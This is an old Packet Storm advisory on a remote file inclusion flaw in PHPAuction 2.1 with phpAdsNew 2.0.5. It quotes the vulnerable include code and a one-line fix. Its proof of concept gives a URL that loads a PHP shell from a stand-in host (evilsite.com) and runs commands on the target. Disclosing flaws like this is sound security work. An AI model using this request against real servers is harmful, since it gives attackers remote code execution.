phpauction21.txt

2006-08-17T00:00:00
ID PACKETSTORM:48951
Type packetstorm
Reporter Philipp Niedziela
Modified 2006-08-17T00:00:00

Description

                                        
                                            `+--------------------------------------------------------------------  
+  
+ PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion  
+  
+--------------------------------------------------------------------  
+  
+ Affected Software .: PHPAuction 2.1 (maybe higher) with phpAdsNew,  
+ phpAdsNew 2.0.5 (maybe higher)  
+ Venedor ...........: http://www.phpauction.net,  
+ http://phpadsnew.com  
+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: Philipp Niedziela  
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_264.htm  
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de  
+  
+--------------------------------------------------------------------  
+  
+ Code /phpAdsNew/view.inc.php:  
+  
+ .....  
+ // Include required files  
+ require ("$phpAds_path/dblib.php");   
+ require ("$phpAds_path/lib-expire.inc.php");  
+ .....  
+  
+--------------------------------------------------------------------  
+  
+ $phpAds_path is not properly sanitized before being used.  
+  
+--------------------------------------------------------------------  
+  
+ Solution:  
+ Declare $phpAds_path before using.  
+  
+--------------------------------------------------------------------  
+ PoC:  
+ Place a PHPShell on a remote location:  
+ http://evilsite.com/dblib.php/index.html  
+  
+ http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/&cmd=ls  
+  
+--------------------------------------------------------------------  
+  
+ Greets:  
+ Krini&Lenni  
+  
+-------------------------[ E O F ]----------------------------------  
`